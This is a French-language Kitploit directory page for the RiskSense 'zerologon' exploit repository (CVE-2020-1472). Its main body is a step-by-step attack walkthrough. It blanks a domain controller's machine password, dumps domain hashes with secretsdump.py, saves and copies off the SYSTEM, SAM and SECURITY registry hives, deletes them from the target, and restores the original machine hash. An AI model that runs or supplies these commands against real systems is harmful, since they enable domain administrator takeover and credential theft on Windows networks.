Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
zerologon — Exploit pour zerologon cve-2020-1472 | Kitploit
Outils/GitHubGitHub/risksense/zerologon
Escalade de PrivilègesAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationTests d'Intrusion
GitHubrisksense/zerologon

zerologon

Exploit pour zerologon cve-2020-1472

Voir le dépôt
704146il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Script d'exploitation ZeroLogon

Code d'exploitation basé sur https://www.secura.com/blog/zero-logon et https://github.com/SecuraBV/CVE-2020-1472. Recherche et scanner originaux par Secura, modifications par RiskSense Inc.

Pour exploiter, supprimez toutes les installations précédentes d'Impacket que vous avez et installez Impacket depuis https://github.com/SecureAuthCorp/impacket/commit/b867b21 ou une version plus récente. Ensuite, faites :

root@kitploit:~
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR

Si cela réussit, vous pourrez alors :

root@kitploit:~
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'

ce qui devrait vous donner les droits d'administrateur du domaine. Après avoir obtenu cela, utilisez wmiexec.py sur le DC cible avec un identifiant provenant du secretsdump et faites :

root@kitploit:~
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save

Ensuite, vous pouvez

root@kitploit:~
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

Et cela devrait vous montrer le hash NT original du compte machine. Vous pouvez ensuite réinstaller ce hash original du compte machine dans le domaine en utilisant

root@kitploit:~
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH

Réinstaller le hash original est nécessaire pour que le DC continue à fonctionner normalement.

Télécharger l’outil